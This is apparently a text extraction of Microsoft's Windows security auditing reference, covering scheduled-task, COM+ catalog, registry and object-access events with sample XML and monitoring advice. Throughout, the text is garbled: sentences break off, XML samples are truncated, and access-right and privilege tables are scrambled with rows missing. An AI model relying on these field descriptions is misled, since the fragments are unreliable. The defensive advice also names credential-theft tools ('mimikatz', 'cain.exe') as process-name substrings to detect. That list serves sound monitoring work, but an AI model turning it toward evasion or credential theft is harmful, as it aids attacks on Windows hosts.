Credential Manager in cleartext format, and can be extracted using Administrative privileges.
4699(S): A scheduled task was deleted.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a scheduled task was
deleted.

Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TaskName">\\Microsoft\\My</Data>
<LogonType>Password</LogonType> </Principal> </Principals> <Settings>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Command>C:\\Windows\\notepad.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete scheduled task” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete scheduled task”
operation.
the following:
Task Information:
Task Name [Type = UnicodeString]: deleted scheduled task name. The format of this value is
Task Content [Type = UnicodeString]: the XML of the deleted task. Here “XML Task Definition Format” you
can read more about the XML format for scheduled tasks.

For 4699(S ): A scheduled task was deleted.
We recommend monitoring all scheduled task deletion events, especially on critical computers or devices.
Scheduled tasks are often used by malware to stay in the system after reboot or for other malicious actions.
However, this event does not often happen.
Monitor for deleted tasks located in the Task Scheduler Library root node, that is, where Task Name looks
like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located in the Task
Scheduler Library root node. Deletion of such tasks can be a sign of malicious activity.
If a highly critical scheduled task exists on some computers, and it should never be deleted, monitor for
4699 events with the corresponding Task Name.
4700(S): A scheduled task was enabled.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a scheduled task is
enabled.

Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enable scheduled task” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “enable scheduled
task” operation.
the following:
Task Information:
Task Name [Type = UnicodeString]: enabled scheduled task name. The format of this value is
Task Content [Type = UnicodeString]: the XML of the enabled task. Here “XML Task Definition Format” you

For 4700(S ): A scheduled task was enabled.
If a highly critical scheduled task exists on some computers, and for some reason it should never be enabled,
monitor for 4700 events with the corresponding Task Name.
4701(S): A scheduled task was disabled.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a scheduled task is
disabled.

Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>false</Enabled> <Hidden>false</Hidden>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “enable scheduled task” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “enable scheduled
task” operation.
the following:
Task Information:
Task Name [Type = UnicodeString]: disabled scheduled task name. The format of this value is
Task Content [Type = UnicodeString]: the XML of the disabled task. Here “XML Task Definition Format” you

For 4701(S ): A scheduled task was disabled.
If a highly critical scheduled task exists on some computers, and it should never be disabled, monitor for 4701
events with the corresponding Task Name.
4702(S): A scheduled task was updated.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time scheduled task was
updated/changed.

Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
<Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change/update scheduled task” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “change/update
scheduled task” operation.
the following:
Task Information:
Task Name [Type = UnicodeString]: updated/changed scheduled task name. The format of this value is
Task New Content [Type = UnicodeString]: the new XML for the updated task. Here “XML Task Definition
Format” you can read more about the XML format for scheduled tasks.

For 4702(S ): A scheduled task was updated.
Monitor for updated scheduled tasks located in the Task Scheduler Library root node, that is, where Task
Name looks like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located
in the Task Scheduler Library root node.
In the updated scheduled task, if the Task Content: XML contains
<LogonType>Password</LogonType> value, trigger an alert. In this case, the password for the account
that will be used to run the scheduled task will be saved in Credential Manager in cleartext format, and can
be extracted using Administrative privileges.
5888(S): An object in the COM+ Catalog was
modified.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event generates when the object in
COM+ Catalog was modified.
For some reason this event belongs to Audit
System Integrity subcategory, but generation
of this event enables in this subcategory.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectUserDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">222443</Data>
<Data Name="ObjectCollectionName">Applications</Data>
<Data Name="ObjectIdentifyingProperties">ID = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} AppPartitionID =
{41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}</Data>
<Data Name="ModifiedObjectProperties">Name = 'COMApp' -> 'COMApp-New' cCOL\_SecurityDescriptor = '<Opaque>' ->
'<Opaque>'</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify/change object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “modify/change
the following:
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection in which the object was
modified. Here is the list of possible collection values with descriptions:
COLLECTION DESCRIPTION
ApplicationCluster Contains a list of the servers in the application cluster.
ApplicationInstances Contains an object for each instance of a running COM+

application.
Applications Contains an object for each COM+ application installed on the

local computer.
Components Contains an object for each component in the application to

which it is related.
ComputerList Contains a list of the computers found in the Computers

folder of the Component Services administration tool.
DCOMProtocols Contains a list of the protocols to be used by DCOM. It

contains an object for each protocol.
ErrorInfo Retrieves extended error information regarding methods that

deal with multiple objects.
EventClassesForIID Retrieves information regarding event classes.
FilesForImport Retrieves information from its MSI file about an application

that can be imported.
InprocServers Contains a list of the in-process servers registered with the

system. It contains an object for each component.
InterfacesForComponent Contains an object for each interface exposed by the

component to which the collection is related.
LegacyComponents Contains an object for each unconfigured component in the

application to which it is related.
LegacyServers Identical to the InprocServers collection except that this

collection also includes local servers.
LocalComputer Contains a single object that holds computer level settings

information for the computer whose catalog you are
accessing.
MethodsForInterface Contains an object for each method on the interface to which

the collection is related.
Partitions Used to specify the applications contained in each partition.
PartitionUsers Used to specify the users contained in each partition.
PropertyInfo Retrieves information about the properties that a specified

collection supports.
PublisherProperties Contains an object for each publisher property for the parent
SubscriptionsForComponent collection.
RelatedCollectionInfo Retrieves information about other collections related to the

collection from which it is called.
Roles Contains an object for each role assigned to the application to

RolesForComponent Contains an object for each role assigned to the component to

which the collection is related.
RolesForInterface Contains an object for each role assigned to the interface to

RolesForMethod Contains an object for each role assigned to the method to

RolesForPartition Contains an object for each role assigned to the partition to

Root Contains the top-level collections on the catalog.
SubscriberProperties Contains an object for each subscriber property for the parent
SubscriptionsForComponent Contains an object for each subscription for the parent

Components collection.
TransientPublisherProperties Contains an object for each publisher property for the parent
TransientSubscriptions collection.
TransientSubscriberProperties Contains an object for each subscriber property for the parent
TransientSubscriptions Contains an object for each transient subscription.
UsersInPartitionRole Contains an object for each user in the partition role to which
UsersInRole Contains an object for each user in the role to which the
collection is related.
WOWInprocServers Contains a list of the in-process servers registered with the

system for 32-bit components on 64-bit computers.
WOWLegacyServers Identical to the LegacyServers collection except that this

collection is drawn from the 32-bit registry on 64-bit
computers.
Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the modified
object. It depends on COM+ Catalog Collection value, for example, if COM+ Catalog Collection =
Applications, then you can find that:
ID - A GUID representing the application. This property is returned when the Key property method is
called on an object of this collection.
AppPartitionID - A GUID representing the application partition ID.
Object Properties Modified [Type = UnicodeString]: the list of object’s (Object Name) properties which
were modified.
The items have the following format: Property_Name = ‘OLD_VALUE’ -> ‘NEW_VALUE’
Check description for specific COM+ Catalog Collection to see the list of object’s properties and
descriptions.

For 5888(S ): An object in the COM+ Catalog was modified.
If you have a specific COM+ object for which you need to monitor all modifications, monitor all 5888 events
with the corresponding Object Name.
5889(S): An object was deleted from the COM+
Catalog.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event generates when the object in the
COM+ Catalog was deleted.
For some reason this event belongs to
Audit System Integrity subcategory, but
generation of this event enables in this
subcategory.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectCollectionName">Applications</Data>
<Data Name="ObjectIdentifyingProperties">ID = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} AppPartitionID =
{41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}</Data>
<Data Name="ObjectProperties">Name = COMApp-New ApplicationProxyServerName = ProcessType = 2 CommandLine =
ServiceName = <null> RunAsUserType = 1 Identity = Interactive User Description = IsSystem = N Authentication =
4 ShutdownAfter = 3 RunForever = N Password = \*\*\*\*\*\*\*\* Activation = Local Changeable = Y Deleteable = Y
CreatedBy = AccessChecksLevel = 1 ApplicationAccessChecksEnabled = 1 cCOL\_SecurityDescriptor = <Opaque>
ImpersonationLevel = 3 AuthenticationCapability = 64 CRMEnabled = 0 3GigSupportEnabled = 0 QueuingEnabled = 0
QueueListenerEnabled = N EventsEnabled = 1 ProcessFlags = 0 ThreadMax = 0 ApplicationProxy = 0 CRMLogFile =
DumpEnabled = 0 DumpOnException = 0 DumpOnFailfast = 0 MaxDumpCount = 5 DumpPath =
%systemroot%\\system32\\com\\dmp IsEnabled = 1 AppPartitionID = {41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}
ConcurrentApps = 1 RecycleLifetimeLimit = 0 RecycleCallLimit = 0 RecycleActivationLimit = 0 RecycleMemoryLimit
= 0 RecycleExpirationTimeout = 15 QCListenerMaxThreads = 0 QCAuthenticateMsgs = 0 ApplicationDirectory =
SRPTrustLevel = 262144 SRPEnabled = 0 SoapActivated = 0 SoapVRoot = SoapMailTo = SoapBaseUrl = Replicable =
1</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
operation.
the following:
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection in which COM+ object was
deleted. Here is the list of possible collection values with descriptions:

application.
Applications Contains an object for each COM+ application installed on the

local computer.










accessing.




RolesForComponent Contains an object for each role assigned to the component to







computers.
Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the deleted
ID - A GUID representing the application. This property is returned when the Key property method is
called on an object of this collection.
Object Details [Type = UnicodeString]: the list of deleted object’s (Object Name) properties.
The items have the following format: Property_Name = VALUE
descriptions.

For 5889(S ): An object was deleted from the COM+ Catalog.
If you have a specific COM+ object for which you need to monitor all modifications (especially delete
operations), monitor all 5889 events with the corresponding Object Name.
5890(S): An object was added to the COM+ Catalog.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event generates when new object was
added to the COM+ Catalog.
For some reason this event belongs to Audit
System Integrity subcategory, but generation
of this event enables in this subcategory.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectCollectionName">Roles</Data>
<Data Name="ObjectIdentifyingProperties">ApplId = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} Name =
CreatorOwner</Data>
<Data Name="ObjectProperties">Description =</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “add object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “add object”
operation.
the following:
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection to which the new object
was added. Here is the list of possible collection values with descriptions:

application.
Applications Contains an object for each COM+ application installed on

the local computer.










accessing.




RolesForComponent Contains an object for each role assigned to the component

to which the collection is related.






computers.
Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the new
ID - A GUID representing the application. This property is returned when the Key property method
is called on an object of this collection.
Object Details [Type = UnicodeString]: the list of new object’s (Object Name) properties.
The items have the following format: Property_Name = VALUE
descriptions.

For 5890(S ): An object was added to the COM+ Catalog.
If you need to monitor for creation of new COM+ objects within specific COM+ collection, monitor all 5890
events with the corresponding COM+ Catalog Collection field value.
Audit Registry
Applies to
Windows 10
Windows Server 2016
Audit Registry allows you to audit attempts to access registry objects. A security audit event is generated only
for objects that have system access control lists (SACLs) specified, and only if the type of access requested,
such as Read, Write, or Modify, and the account making the request match the settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a
registry object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a registry object that has a matching SACL.
Event volume: Low to Medium, depending on how registry SACLs are configured.

Domain IF IF IF IF We strongly
Controller recommend that
you develop a
Registry Objects
Security
Monitoring
policy and define
appropriate
SACLs for
registry objects
for different
operating
system
templates and
roles. Do not
enable this
subcategory if
you have not
planned how to
use and analyze
the collected
information. It is
also important
to delete non-
effective, excess
SACLs.
Otherwise the
auditing log will
be overloaded
with useless
information.
Failure events
can show you
unsuccessful
attempts to
access specific
registry objects.
Consider
enabling this
subcategory for
critical
computers first,
after you
develop a
Registry Objects
Security
Monitoring
policy for them.
Member Server IF IF IF IF
Workstation IF IF IF IF
Events List:
4657(S ): A registry value was modified.
5039(-): A registry key was virtualized.
4663(S): An attempt was made to access an
object.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File
System, Audit Kernel Object,
Audit Registry, and Audit
Removable Storage
Event Description:
This event indicates that a
specific operation was
performed on an object. The
object could be a file system,
kernel, or registry object, or a
file system object on
removable storage or a
device.
This event generates only if
object’s SACL has required
ACE to handle specific access
right use.
The main difference with
“4656: A handle to an object
was requested.” event is that
4663 shows that access right
was used instead of just
requested and 4663 doesn’t have Failure events.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to access an object. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory
domain controller, and stored in a security database. Each time a user logs on, the system retrieves the
SID for that user from the database and places it in the access token for that user. The system uses the
SID in the access token to identify the user in all subsequent interactions with Windows security. When a
SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify
another user or group. For more information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an
object.
events that might contain the same Logon ID, for example, “4624: An account was successfully logged
on.”
Object:
Object Name [Type = UnicodeString]: name and other identifying information for the object for
which access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used
for correlation with other events, for example with Handle ID field in “4656(S, F ): A handle to an
object was requested.” This parameter might not be captured in the event, and in that case appears as
“0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For
some objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;
("Impact_MS",TI,0x10020,3000))
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process
ID (PID ) is a number used by the operating system to uniquely identify an active process. To see the
PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID.
These access rights depend on Object Type. The following table contains information about the most
common access rights for file system objects. Access rights for registry objects are often similar to file
system objects, but the table contains a few notes about how they vary.
HEX VALUE,
%%4416 to read the corresponding file data.
(For registry objects, this is “Query For a directory object, the right to
key value.”) read the corresponding directory
data.
directory.
WriteData (or AddFile) 0x2, WriteData - For a file object, the

%%4417 right to write data to the file. For a
(For registry objects, this is “Set key directory object, the right to create a
value.”) file in the directory (FILE_ADD_FILE).

AddSubdirectory - For a directory,
the right to create a subdirectory.

(For registry objects, this is %%4419 attributes.
“Enumerate sub-keys.”)

%%4420 attributes.

Traverse - For a directory, the right
to traverse the directory. By default,
users are assigned the
HEX VALUE,


%%4423

%%4424

%%1537
READ_CONTROL 0x20000, The right to read the information in

%%1538 the object's security descriptor, not
including the information in the
system access control list (SACL).

%%1539 access control list (DACL) in the
object's security descriptor.


to wait until the object is in the
signaled state. Some object types do
not support this access right.


events.
If you have critical file system objects for which you need to monitor all access attempts, monitor this
event for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for
example, write actions), monitor this event for Object Name in relation to Access Request
If Object Name is a sensitive or critical registry key for which you need to monitor specific access
attempts (for example, only write actions), monitor for all 4663 events with the corresponding Access
Request Information\Accesses.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events
with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32
or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
For file system objects, we recommend that you monitor for these Access Request
Information\Accesses rights:
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Applies to
Windows 10
Windows Server 2016
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel,
or registry object, or a file system object on removable storage or a device.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access
rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the
operation was performed. To see that the operation was performed, check “4663(S ): An attempt was made to
access an object.”
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:
(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested a handle to an object. Event Viewer
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory
domain controller, and stored in a security database. Each time a user logs on, the system retrieves the
SID for that user from the database and places it in the access token for that user. The system uses the
SID in the access token to identify the user in all subsequent interactions with Windows security. When a
SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify
another user or group. For more information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested a handle to an
object.
events that might contain the same Logon ID, for example, “4624: An account was successfully logged
on.”
Object:

Object Name [Type = UnicodeString]: name and other identifying information for the object for
which access was requested. For example, for a file, the path would be included.
correlate this event with other events that might contain the same Handle ID, for example, “4663(S ):
An attempt was made to access an object.” This parameter might not be captured in the event, and in
that case appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For
some objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;
("Impact_MS",TI,0x10020,3000))
requested. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Transaction ID [Type = GUID ]: unique GUID of the transaction. This field can help you correlate this
event with other events that might contain the same Transaction ID, such as “4660(S ): An object was
deleted.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-
0000-0000-000000000000}”.
Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to
identify resources, activities or instances.
These access rights depend on Object Type. The following table contains information about the most
common access rights for file system objects. Access rights for registry objects are often similar to file
system objects, but the table contains a few notes about how they vary.
HEXADECIMAL VALUE,
%%4416 to read the corresponding file data.
(For registry objects, this is “Query For a directory object, the right to
key value.”) read the corresponding directory
data.
directory.
HEXADECIMAL VALUE,
WriteData (or AddFile) 0x2, WriteData - For a file object, the

%%4417 right to write data to the file. For a
(For registry objects, this is “Set key directory object, the right to create a
value.”) file in the directory (FILE_ADD_FILE).

AddSubdirectory - For a directory,
the right to create a subdirectory.

(For registry objects, this is %%4419 attributes.
“Enumerate sub-keys.”)

%%4420 attributes.

Traverse - For a directory, the right
to traverse the directory. By default,
users are assigned the


%%4423

%%4424

%%1537
HEXADECIMAL VALUE,
READ_CONTROL 0x20000, The right to read the information in

%%1538 the object's security descriptor, not
including the information in the
system access control list (SACL).

%%1539 access control list (DACL) in the
object's security descriptor.


to wait until the object is in the
signaled state. Some object types do
not support this access right.

Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For
more information, see the preceding table.

of a process.
initiate a process to replace the
default token associated with a
started subprocess.

operations.
bypass file and directory, registry, and
other persistent object permissions
for the purposes of backing up the
system.
grant all read access control to any
file, regardless of the access control
list (ACL) specified for the file. Any
access request other than read is still
access rights are granted if this
privilege is held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE

privilege also causes the system to
skip all traversal access checks.
traverse directory trees even though
the user may not have permissions
on the traversed directory. This
privilege does not allow the user to
list the contents of a directory, only to
traverse directories.
SeCreateGlobalPrivilege Create global objects Required to create named file

mapping objects in the global
namespace during Terminal Services
sessions.
SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent

object.
necessary to assign them the
privilege.


creation APIs.
When a process requires this
privilege, we recommend using the
LocalSystem account (which already
includes the privilege), rather than
creating a separate user account and
assigning this privilege to it.

another account.
attach a debugger to any process or
to the kernel. Developers who are
debugging their own applications do
not need this user right. Developers
who are debugging new system
components need this user right. This
user right provides complete access
to sensitive and critical operating
system components.
SeEnableDelegationPrivilege Enable computer and user accounts Required to mark user and computer
to be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set
the Trusted for Delegation setting
on a user or computer object.
privilege must have write access to
the account control flags on the user
or computer object. A server process
running on a computer (or under a
user context) that is trusted for
delegation can access resources on
another computer using the
delegated credentials of a client, as
long as the account of the client does
not have the Account cannot be
delegated account control flag set.
SeIncreaseBasePriorityPrivilege Increase scheduling priority Required to increase the base priority

of a process.
execution priority assigned to the
other process. A user with this
privilege can change the scheduling
priority of a process through the Task
Manager user interface.
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Required to increase the quota
assigned to a process.
change the maximum memory that
can be consumed by a process.
SeIncreaseWorkingSetPrivilege Increase a process working set Required to allocate more memory

for applications that run in the
context of users.
driver.
drivers or other code in to kernel
mode. This user right does not apply
to Plug and Play device drivers.

memory.
from paging the data to virtual
memory on disk. Exercising this
privilege could significantly affect
system performance by decreasing
the amount of available random
access memory (RAM).
SeMachineAccountPrivilege Add workstations to domain With this privilege, the user can create
a computer account.
controllers.
SeManageVolumePrivilege Perform volume maintenance tasks Required to run maintenance tasks on

a volume, such as remote
defragmentation.
SeProfileSingleProcessPrivilege Profile single process Required to gather profiling

information for a single process.
system processes.

SeRemoteShutdownPrivilege Force shutdown from a remote Required to shut down a system

system using a network request.
SeRestorePrivilege Restore files and directories Required to perform restore

operations. This privilege causes the
system to grant all write access
control to any file, regardless of the
ACL specified for the file. Any access
request other than write is still
evaluated with the ACL. Additionally,
this privilege enables you to set any
valid user or group SID as the owner
of a file. The following access rights
are granted if this privilege is held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
bypass file, directory, registry, and
other persistent objects permissions
when restoring backed up files and
directories and determines which
users can set any valid security
principal as the owner of an object.

controlling and viewing audit events
in security event log.
specify object access auditing options
for individual resources, such as files,
Active Directory objects, and registry
keys.
A user with this privilege can also
view and clear the security log.
SeSyncAgentPrivilege Synchronize directory service data This privilege enables the holder to
read all objects and properties in the
synchronization.

information.
SeSystemProfilePrivilege Profile system performance Required to gather profiling

information for the entire system.
processes.
change the time and date on the
internal clock of the computer. Users
that are assigned this user right can
affect the appearance of event logs. If
the system time is changed, events
that are logged will reflect this new
time, not the actual time that the
events occurred.
SeTakeOwnershipPrivilege Take ownership of files or other Required to take ownership of an

objects object without being granted
discretionary access. This privilege
allows the owner value to be set only
to those values that the holder may
legitimately assign as the owner of an
object.
therefore gain access to the same
local resources as that user.
associated with the computer's
internal clock.
SeTrustedCredManAccessPrivilege Access Credential Manager as a Required to access Credential

trusted caller Manager as a trusted caller.
SeUndockPrivilege Remove computer from docking Required to undock a laptop.

station With this privilege, the user can
undock a portable computer from its
docking station without logging on.
SeUnsolicitedInputPrivilege Not applicable Required to read unsolicited input

from a terminal device.
Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only
specific Object Types.
events.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events
with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32
or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
If Object Name is a sensitive or critical object for which you need to monitor any access attempt,
monitor all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656
events with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request
Information\Accesses rights (especially for Failure events):
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Applies to
Windows 10
Windows Server 2016
Event Description:
device.
This event generates only if Success auditing
is enabled for Audit Handle Manipulation
subcategory.
open. Otherwise, it might not have any
security relevance.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s
handle” operation.
the following:
Object:
closed. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.

events.
Applies to
Windows 10
Windows Server 2016
Kernel Object, and Audit Registry
Event Description:
This event generates only if “Delete" auditing
is set in object’s SACL.
deleted object (only the Handle ID ). It is
better to use “4663(S ): An attempt was made
to access an object” with DELETE access to
track object deletion.
generated only during real delete operations.
In contrast, “4663(S ): An attempt was made
to access an object” also generates during
other actions, such as object renaming.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
operation.
Object:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID
Transaction ID [Type = GUID ]: unique GUID of the transaction. This field can help you correlate this
event with other events that might contain the same Transaction ID, such as “4656(S, F ): A handle to an
object was requested.”
0000-000000000000}”.
parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need
to monitor at the Kernel objects level.
4657(S): A registry value was modified.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Registry
Event Description:
This event generates when a registry key
value was modified. It doesn’t generate when
a registry key was modified.
This event generates only if “Set Value"
auditing is set in registry key’s SACL.

Event XML:
- <System>
<Level>0</Level>
<Task>12801</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectName">\\REGISTRY\\MACHINE</Data>
<Data Name="ObjectValueName">Name\_New</Data>
<Data Name="OperationType">%%1905</Data>
<Data Name="OldValueType">%%1873</Data>
<Data Name="OldValue" />
<Data Name="NewValueType">%%1873</Data>
<Data Name="NewValue">Andrei</Data>
<Data Name="ProcessId">0xce4</Data>
<Data Name="ProcessName">C:\\Windows\\regedit.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify registry value” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “modify registry
value” operation.
the following:
Object:
Object Name [Type = UnicodeString]: full path and name of the registry key which value was modified.
The format is: \REGISTRY\HIVE\PATH where:
HIVE:
HKEY_LOCAL_MACHINE = \REGISTRY\MACHINE
HKEY_CURRENT_USER = \REGISTRY\USER\[USER_SID ], where [USER_SID ] is the SID of
current user.
HKEY_CLASSES_ROOT = \REGISTRY\MACHINE\SOFTWARE\Classes
HKEY_USERS = \REGISTRY\USER
HKEY_CURRENT_CONFIG = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\Current
PATH – path to the registry key.
Object Value Name [Type = UnicodeString]: the name of modified registry key value.
correlate this event with other events that might contain the same Handle ID, for example, “4656: A handle
to an object was requested.” This parameter might not be captured in the event, and in that case appears as
“0x0”.
Operation Type [Type = UnicodeString]: the type of performed operation with registry key value. Most
common operations are:
New registry value created
Registry value deleted
Existing registry value modified
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the registry key value
was modified. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Change Information:
Old Value Type [Type = UnicodeString]: old type of changed registry key value. Registry key value types:
VALUE TYPE DESCRIPTION
REG_SZ String
REG_BINARY Binary
REG_DWORD DWORD (32-bit) Value
REG_QWORD QWORD (64-bit) Value
REG_MULTI_SZ Multi-String Value
REG_EXPAND_SZ Expandable String Value
Old Value [Type = UnicodeString]: old value for changed registry key value.
New Value Type [Type = UnicodeString]: new type of changed registry key value. See table above for
possible values.
New Value [Type = UnicodeString]: new value for changed registry key value.

For 4657(S ): A registry value was modified.
If Object Name is a sensitive or critical registry key for which you need to monitor any modification of its
values, monitor all 4657 events.
